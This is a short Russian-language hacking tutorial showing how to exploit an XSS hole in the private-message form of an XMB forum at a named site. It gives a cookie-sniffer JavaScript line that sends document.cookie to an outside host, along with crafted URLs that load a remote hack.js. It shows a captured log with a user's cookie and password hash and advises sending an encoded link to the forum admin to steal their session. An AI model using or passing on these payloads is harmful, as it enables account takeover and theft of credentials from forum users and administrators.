Привет я XgLuir

Сейчас я покажу XSS в форумах XMB

идем на форум а потом в отправку личных сообщений

http://www.karakelle.ru/forum/u2u.php?action=send - тут форма для отпраки!

Дыра находиться в форме для получателей из-за плохой фильтрации

Как видите пашет внедрим снифир

Для этого создадим js файл с кодом для сниффера

img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;

он у меня уже есть

http://www.fath.jino-net.ru/hack.js

Внедрим

REFERER=http://www.karakelle.ru/forum/u2u.php?action=send&username=<script>alert('xss')</script><script%20src=http://www.fath.jino-net.ru/hack.js></script>
QUERY=xmblva=1131740719; xmbuser=Зайка; xmbpw=202cb962ac59075b964b07152d234b70; xmblvb=1131737548
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)



Ну вот получили
xmbpw=202cb962ac59075b964b07152d234b70 - md5 hash

Но наверно появился вапрос а как у админы стырить ?

Отправляем админу сформированый линк он открывает и снифф записывает кукисы

http://www.karakelle.ru/forum/u2u.php?action=send&username=<script%20src=http://www.fath.jino-net.ru/hack.js></script>

Но лучше ссылку за кодировать

Вот и все